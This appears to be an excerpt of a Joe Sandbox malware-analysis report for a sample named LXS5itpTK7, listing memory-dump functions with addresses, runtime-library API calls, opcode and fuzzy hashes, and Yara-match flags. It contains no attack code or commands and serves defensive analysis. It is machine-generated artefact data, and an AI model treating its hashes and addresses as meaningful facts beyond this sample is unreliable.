Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: FindInstanceTargetType$Offset
String ID:
API String ID: 1467055271-0
Opcode ID: 6fe96d91ed349e682c0e64a172f602ef2dce5d8881000acf6ba3df64c6c4f2c7
Instruction ID: 1585e95c62750a9e9e515df4a36d095fc6f55fe9aeaa922db0a13677253b0a68
Opcode Fuzzy Hash: 6fe96d91ed349e682c0e64a172f602ef2dce5d8881000acf6ba3df64c6c4f2c7
Instruction Fuzzy Hash: BB213B72684224DFCF18DF68DC45E6E77B6EF48750B11429BED3493180DB31E581CA91

Function 02135437 Relevance: 9.1, APIs: 6, Instructions: 82COMMON

Download Yara Rule

APIs

__Cnd_init.LIBCPMT ref: 0213544B
__Mtx_init.LIBCPMT ref: 02135471
std::_Cnd_initX.LIBCPMT ref: 02135494
__Thrd_start.LIBCPMT ref: 021354B9
std::_Cnd_waitX.LIBCPMT ref: 021354D9
std::_Cnd_initX.LIBCPMT ref: 02135506

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
String ID:
API String ID: 1687354797-0
Opcode ID: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
Instruction ID: 6e6070e9deb5aadd00ca44c20344040fe2eab60aa9419d0c83325240b465d816
Opcode Fuzzy Hash: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
Instruction Fuzzy Hash: 2C219472C84208AEDF16EBB4E844BDE77FBAF08725F544019E404B7140EB7599448B65

Function 00428DDA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00428DD1,00426762,004406A0,00000008,00440A05,?,?,?,?,00423A4B,?,?,D89EACEA), ref: 00428DE8
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00428DF6
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00428E0F
SetLastError.KERNEL32(00000000,?,00428DD1,00426762,004406A0,00000008,00440A05,?,?,?,?,00423A4B,?,?,D89EACEA), ref: 00428E61

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
Instruction ID: 8d354f8c373550ad8ca54886775f1e1f72959a5719103f68ef850459183cda9d
Opcode Fuzzy Hash: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
Instruction Fuzzy Hash: 5801283630A7316EA7242BF57C8956F2744EB0677ABA0033FF414913E2EF194C21950D

Function 02159041 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,02159038,021569C9,02170907,00000008,02170C6C,?,?,?,?,02153CB2,?,?,0045A064), ref: 0215904F
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0215905D
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 02159076
SetLastError.KERNEL32(00000000,?,02159038,021569C9,02170907,00000008,02170C6C,?,?,?,?,02153CB2,?,?,0045A064), ref: 021590C8

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
Instruction ID: ef71c342569a994c119623630dc0d15027026d6cdd42ba368c252a111bcb31f7
Opcode Fuzzy Hash: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
Instruction Fuzzy Hash: 3301FC32289731EEA72427B4AC8996B274DEF05775B3007B9FD30452E0EF1288114DD6

Function 00404D52 Relevance: 9.1, APIs: 6, Instructions: 53COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00404D63
int.LIBCPMT ref: 00404D7A

Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87

std::locale::_Getfacet.LIBCPMT ref: 00404D83
std::_Facet_Register.LIBCPMT ref: 00404DB4
std::_Lockit::~_Lockit.LIBCPMT ref: 00404DCA
__CxxThrowException@8.LIBVCRUNTIME ref: 00404DE8

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
Instruction ID: 50d9ff0d4b57cf36d5715a51c78873cd43da78958b4b2dc720108d245924cf68
Opcode Fuzzy Hash: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
Instruction Fuzzy Hash: EB11A0B2D101299BCB15EBA4C841AAE77B0AF44318F14457FE911BB2D2DB3C9A058BDD

Function 02134FB9 Relevance: 9.1, APIs: 6, Instructions: 53COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 02134FCA
int.LIBCPMT ref: 02134FE1

Part of subcall function 0213BFC3: std::_Lockit::_Lockit.LIBCPMT ref: 0213BFD4
Part of subcall function 0213BFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 0213BFEE

std::locale::_Getfacet.LIBCPMT ref: 02134FEA
std::_Facet_Register.LIBCPMT ref: 0213501B
std::_Lockit::~_Lockit.LIBCPMT ref: 02135031
__CxxThrowException@8.LIBVCRUNTIME ref: 0213504F

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
Instruction ID: 92dcaffdaa3914396e5e8fbadd14b73911da7ae9d91969e17e5a68cbd5174500
Opcode Fuzzy Hash: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
Instruction Fuzzy Hash: 0C11C231984218DFCF26EB64C800AAE7777BF08754F540119E825BB2D0DB759A05CFD0

Function 0040C189 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040C19A
int.LIBCPMT ref: 0040C1B1

Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87

std::locale::_Getfacet.LIBCPMT ref: 0040C1BA
std::_Facet_Register.LIBCPMT ref: 0040C1EB
std::_Lockit::~_Lockit.LIBCPMT ref: 0040C201
__CxxThrowException@8.LIBVCRUNTIME ref: 0040C21F

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
Instruction ID: ee53003dfc9470fa79d8cc5ab50186f75a1860792542933f5f9c6443a3e70220
Opcode Fuzzy Hash: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
Instruction Fuzzy Hash: B2119172900219EBCB15EB90C881AAD7760AF44314F14053FE811BB2D2DB389A059B99

Function 004054D2 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 004054E3
int.LIBCPMT ref: 004054FA

Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87

std::locale::_Getfacet.LIBCPMT ref: 00405503
std::_Facet_Register.LIBCPMT ref: 00405534
std::_Lockit::~_Lockit.LIBCPMT ref: 0040554A
__CxxThrowException@8.LIBVCRUNTIME ref: 00405568

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 10913962cff3651302842d72b7cb42c766a1b7b0878e2d3a054d6c0589329772
Instruction ID: 21a092b80c120d3a1799ad65edf81cfe58c90a4d0a542ae4cd53e0a409a0227e
Opcode Fuzzy Hash: 10913962cff3651302842d72b7cb42c766a1b7b0878e2d3a054d6c0589329772
Instruction Fuzzy Hash: A711AC72D10628ABCB15EBA4C801AAE7774EF44318F14053EE811BB2D2DB389A058F9C

Function 0040556E Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040557F
int.LIBCPMT ref: 00405596

Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87

std::locale::_Getfacet.LIBCPMT ref: 0040559F
std::_Facet_Register.LIBCPMT ref: 004055D0
std::_Lockit::~_Lockit.LIBCPMT ref: 004055E6
__CxxThrowException@8.LIBVCRUNTIME ref: 00405604

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: f8330ae3b68186870bdfbd2c21a05cb33b5aede15e19bdae88c6f234de43f936
Instruction ID: 21547056dedd0a357f918a94d9d64b27cd1eadba8e4608574907870a271d474c
Opcode Fuzzy Hash: f8330ae3b68186870bdfbd2c21a05cb33b5aede15e19bdae88c6f234de43f936
Instruction Fuzzy Hash: 3D119E72900628EBCB15EBA5C841AEEB370EF04314F14453FE811BB2D2DB789A058B9C

Function 00404C14 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00404C25
int.LIBCPMT ref: 00404C3C

Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87

std::locale::_Getfacet.LIBCPMT ref: 00404C45
std::_Facet_Register.LIBCPMT ref: 00404C76
std::_Lockit::~_Lockit.LIBCPMT ref: 00404C8C
__CxxThrowException@8.LIBVCRUNTIME ref: 00404CAA

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
Instruction ID: 1aa241efc112286da59c73bb00310cdec327cb4216d8ea75c5d160ea2c1741d7
Opcode Fuzzy Hash: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
Instruction Fuzzy Hash: 5311E0B2C002289BCB11EBA0C801AEE7774AF44318F10053FE911BB2D1CB389E058B98

Function 0213C3F0 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0213C401
int.LIBCPMT ref: 0213C418

Part of subcall function 0213BFC3: std::_Lockit::_Lockit.LIBCPMT ref: 0213BFD4
Part of subcall function 0213BFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 0213BFEE

std::locale::_Getfacet.LIBCPMT ref: 0213C421
std::_Facet_Register.LIBCPMT ref: 0213C452
std::_Lockit::~_Lockit.LIBCPMT ref: 0213C468
__CxxThrowException@8.LIBVCRUNTIME ref: 0213C486

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
Instruction ID: 29ba8a5cf65339bba8fbf45129cbfa3d5010a464b70d557e20e3c0bfc84f886d
Opcode Fuzzy Hash: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
Instruction Fuzzy Hash: 12117C729802289FCB16FBA4D844AEE7777AF44724F54051AE811BB290DF359A05CFD4

Function 02134E7B Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 02134E8C
int.LIBCPMT ref: 02134EA3

Part of subcall function 0213BFC3: std::_Lockit::_Lockit.LIBCPMT ref: 0213BFD4
Part of subcall function 0213BFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 0213BFEE

std::locale::_Getfacet.LIBCPMT ref: 02134EAC
std::_Facet_Register.LIBCPMT ref: 02134EDD
std::_Lockit::~_Lockit.LIBCPMT ref: 02134EF3
__CxxThrowException@8.LIBVCRUNTIME ref: 02134F11

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
Instruction ID: 1008cfda2b3992152f28a07d27ffa4b1c69e68e894ed365a76d576edd4c93163
Opcode Fuzzy Hash: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
Instruction Fuzzy Hash: BB11CE328802289FCF16EBA4D800AEE77B7AF44314F240129E810AB290DF799A05CFD0

Function 00404E63 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00404E6A

Part of subcall function 0040BB47: __EH_prolog3_GS.LIBCMT ref: 0040BB4E

std::_Locinfo::_Locinfo.LIBCPMT ref: 00404EB5
__Getcoll.LIBCPMT ref: 00404EC4
std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404ED4

Strings

fJ@, xrefs: 00404EBE

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
String ID: fJ@
API String ID: 1836011271-3478227103
Opcode ID: c526677c734dc493626db39d482cf98f5f5362d0ee08f882613185e0243459e5
Instruction ID: b09a35a98a06b47a9133a0f6fd6c3c5fe655fd81b24a3011873ef7005f6a19eb
Opcode Fuzzy Hash: c526677c734dc493626db39d482cf98f5f5362d0ee08f882613185e0243459e5
Instruction Fuzzy Hash: 160157719002089FDB00EFA5C481B9EB7B0BF80318F10857EE045AB6C1CB789A84CB99

Function 0042FEE4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0042FE95,00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002), ref: 0042FF04
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0042FF17
FreeLibrary.KERNEL32(00000000,?,?,?,0042FE95,00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000), ref: 0042FF3A

Strings

mscoree.dll, xrefs: 0042FEFD
CorExitProcess, xrefs: 0042FF0F

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: a7c01f4cf2846fc1278f2b92eb4297b36712501a434ecdb6ef0bfa768b076a5b
Instruction ID: 2c645cf7ccd09daad3cc37133732e5cb7e12e7ad02a2fd82027b287817b89b2c
Opcode Fuzzy Hash: a7c01f4cf2846fc1278f2b92eb4297b36712501a434ecdb6ef0bfa768b076a5b
Instruction Fuzzy Hash: 00F0C830A10218BBDB109F90DD09B9EFFB4EF05B12F5100B6F805A2290CB799E44CB9C

Function 0041CE0D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35threadCOMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0041CE21
Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0041CE45
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041CE58
__CxxThrowException@8.LIBVCRUNTIME ref: 0041CE66

Strings

pScheduler, xrefs: 0041CE50

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
String ID: pScheduler
API String ID: 3657713681-923244539
Opcode ID: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
Instruction ID: 55b545704ffbdb88c77e4cd2f194ab5b8344582a808f7ff6d102e262485e3fbf
Opcode Fuzzy Hash: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
Instruction Fuzzy Hash: 7FF05935940714A7C714EA05DC82CDEB3799E90B18760822FE40963282DF3CA98AC29D

Function 021708F1 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 021708F8
make_shared.LIBCPMT ref: 02170943

Strings

RCC, xrefs: 0217092A
v)D, xrefs: 021708F3
MOC, xrefs: 0217091B

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: H_prolog3_catchmake_shared
String ID: MOC$RCC$v)D
API String ID: 3472968176-3108830043
Opcode ID: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
Instruction ID: 7395a34753fd14fe17636373c7e81a6f0de3b1f0d9fe4043254e8ca84f9e5736
Opcode Fuzzy Hash: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
Instruction Fuzzy Hash: 30F04F71A80664DFEB16FF64C40066C377AAF99B04F8580D1F8449B260CB785A89CFE1

Function 0042B106 Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c38956e1fcac5f369ef9c80324371170828598558401bce77602d6080795c3e
Instruction ID: bf4f81b698e6ff7fb3fc7778d7bd366b6aaf8ee244f588ee8458200c33ffab4c
Opcode Fuzzy Hash: 6c38956e1fcac5f369ef9c80324371170828598558401bce77602d6080795c3e
Instruction Fuzzy Hash: E7719D31A00366DBCB21CF95E884ABFBB75FF45360F98426AE81097290D7789D41C7E9

Function 0215B36D Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
Instruction ID: d713f7ce757f688896ff9a496994b3f86ac142752f38dd14640ce9c92d699496
Opcode Fuzzy Hash: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
Instruction Fuzzy Hash: BD719371998236DBCB398F54C884ABFBB75FF45318F1442A9EC3157188D7708A41CBA1

Function 00430A44 Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9

_free.LIBCMT ref: 00430B4F
_free.LIBCMT ref: 00430B66
_free.LIBCMT ref: 00430B85
_free.LIBCMT ref: 00430BA0
_free.LIBCMT ref: 00430BB7

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: 4b14be92388a641d302b0d73df062879f9d592ea064aecebb9857b6d72074d0e
Instruction ID: f55d0931b52299485a7a2c2bc17b7062c97d80267fd2ec389340ea5f3bc65001
Opcode Fuzzy Hash: 4b14be92388a641d302b0d73df062879f9d592ea064aecebb9857b6d72074d0e
Instruction Fuzzy Hash: 1B51E171A00304AFEB21AF69D851B6BB7F5EF5C724F14166EE809D7250E739E9018B88

Function 02160CAB Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0216390E: RtlAllocateHeap.NTDLL(00000000,0213DAD7,00000000), ref: 02163940

_free.LIBCMT ref: 02160DB6
_free.LIBCMT ref: 02160DCD
_free.LIBCMT ref: 02160DEC
_free.LIBCMT ref: 02160E07
_free.LIBCMT ref: 02160E1E

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: 04cddca887ba2481dccaf07e364353f16ad7a97d03e7f311f8a0717563f20aa1
Instruction ID: 0fbaa6f1be2a6c424e15528bd229719bdc47b36d9635589908a020bea26a6f68
Opcode Fuzzy Hash: 04cddca887ba2481dccaf07e364353f16ad7a97d03e7f311f8a0717563f20aa1
Instruction Fuzzy Hash: 8A51B272A80304AFDB25DF69C844B7EB7F5FF48724B144669E809D7250E732EA61CB80

Function 004314DB Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0043154D
_free.LIBCMT ref: 0043156D

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
Instruction ID: a8a3d8b7f400355b52e94c2f1cdfa5b65e8520eb193c97cf831389b305dd6f12
Opcode Fuzzy Hash: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
Instruction Fuzzy Hash: C641C332A00204AFCB10DF79C981A5EB7F5EF89718F25456AE616EB391DB35ED01CB84

Function 02161742 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 021617B4
_free.LIBCMT ref: 021617D4

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
Instruction ID: 8e9f4969ab6338f07f53d06bdca2214b3f8c44ccd9c451e3f4e45819eb3ca926
Opcode Fuzzy Hash: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
Instruction Fuzzy Hash: 3A412436A40304AFCB14DF78C884A6DB7F6EF89714F1545A9DA19EB381DB31E911CB80

Function 0043689D Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,23E85006,0042D0FA,00000000,00000000,0042D938,?,0042D938,?,00000001,0042D0FA,23E85006,00000001,0042D938,0042D938), ref: 004368EA
__alloca_probe_16.LIBCMT ref: 00436922
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00436973
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00436985
__freea.LIBCMT ref: 0043698E

Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 313313983-0
Opcode ID: 9c34806f26188793042e586e0c43cfd4b91246b94106e2b49bc92d76a4d51be1
Instruction ID: 7e388e7d71fb0b77ac45b15fa9433514929e8a136d1dde51ddb927b45f4c022b
Opcode Fuzzy Hash: 9c34806f26188793042e586e0c43cfd4b91246b94106e2b49bc92d76a4d51be1
Instruction Fuzzy Hash: AF310372A1020AABDF259F65CC41EAF7BA5EF48710F15422AFC04D7250E739CD54CB94

Function 0041AEC6 Relevance: 7.6, APIs: 5, Instructions: 88COMMON

Download Yara Rule

APIs

_SpinWait.LIBCONCRT ref: 0041AEEB

Part of subcall function 00410F21: _SpinWait.LIBCONCRT ref: 00410F39

Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0041AEFF
Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0041AF31
List.LIBCMT ref: 0041AFB4
List.LIBCMT ref: 0041AFC3

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

